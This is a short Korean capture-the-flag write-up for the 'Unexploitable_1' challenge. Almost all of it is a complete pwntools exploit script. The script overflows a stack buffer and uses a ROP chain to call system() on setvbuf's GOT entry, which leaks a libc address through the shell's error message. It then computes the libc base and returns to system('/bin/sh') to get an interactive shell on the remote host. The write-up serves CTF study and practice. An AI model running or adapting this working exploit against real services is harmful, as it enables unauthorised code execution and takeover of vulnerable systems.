system 함수를 이용해서 leak를 할 수 있다는 것을 처음 알았다. 인자로 setvbuf의 GOT 주소를 넘기면 system은 GOT에 저장된 libc 주소 바이트를 명령어 이름으로 실행하려 하고, 셸이 `sh: 1: <주소 바이트>: not found` 형태의 에러로 그 바이트를 그대로 출력해 주기 때문이다.
이렇게 libc 주소를 leak한 뒤 libc base를 계산하고, RTL(return-to-libc)로 system("/bin/sh")을 호출하면 된다.
from pwn import *
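r = remote('ctf.j0n9hyun.xyz', 3023)
e = ELF('./Unexploitable_1')
context.arch = 'amd64'

# `pop rdi; ret` gadget in the binary: loads the first argument of each call.
pr = 0x00000000004007d3

# Offsets inside the remote libc, relative to its load base. They must match
# the libc the challenge actually runs with (these look like the Ubuntu 16.04
# glibc 2.23 values -- verify against the libc shipped with the challenge
# before reusing them); wrong offsets crash stage 2 instead of spawning a shell.
SETVBUF_OFF = 0x06fe70
SYSTEM_OFF = 0x045390
BINSH_OFF = 0x18cd57

# Saved RIP sits 24 bytes past the start of the overflowed buffer.
# bytes literals keep the payload valid on Python 3 pwntools (str + bytes
# concatenation raises TypeError there) and still work on Python 2.
PAD = b'A' * 24

# Stage 1 -- use system() as an output primitive: system(setvbuf@got) makes
# sh try to run a "command" whose name is the raw libc pointer stored in the
# GOT slot, and sh echoes that name back in its "not found" error. Returning
# to main afterwards lets the overflow be triggered a second time.
stage1 = PAD
stage1 += p64(pr)
stage1 += p64(e.got['setvbuf'])
stage1 += p64(e.sym['system'])
stage1 += p64(e.sym['main'])
r.sendline(stage1)

# The error looks like `sh: 1: <name>: not found` (dash format). A canonical
# user-space address has its top two bytes zero, so exactly 6 bytes are
# printed; recvn() blocks until all 6 arrive instead of returning a short read.
r.recvuntil(b'1: ')
leak = u64(r.recvn(6).ljust(8, b'\x00'))
log.info('leak : {}'.format(hex(leak)))

# Sanity check: libc is mapped page-aligned, so the low 12 bits of the leaked
# setvbuf pointer must equal the low 12 bits of its offset. Anything else means
# the offsets are wrong or the output was not what we parsed.
if leak & 0xfff != SETVBUF_OFF & 0xfff:
    log.error('leak {} does not look like setvbuf@libc (wrong offsets or garbled output?)'.format(hex(leak)))

libc_base = leak - SETVBUF_OFF
system = libc_base + SYSTEM_OFF
binsh = libc_base + BINSH_OFF
log.info('libc_base : {}'.format(hex(libc_base)))

# Stage 2 -- classic return-to-libc: system("/bin/sh").
# NOTE(review): if system() dies with SIGSEGV on a movaps inside libc, the
# stack is misaligned at the call; insert one extra `ret` gadget before
# `system` in this chain -- not needed in the original run, confirm if reused.
stage2 = PAD
stage2 += p64(pr)
stage2 += p64(binsh)
stage2 += p64(system)
r.sendline(stage2)
r.interactive()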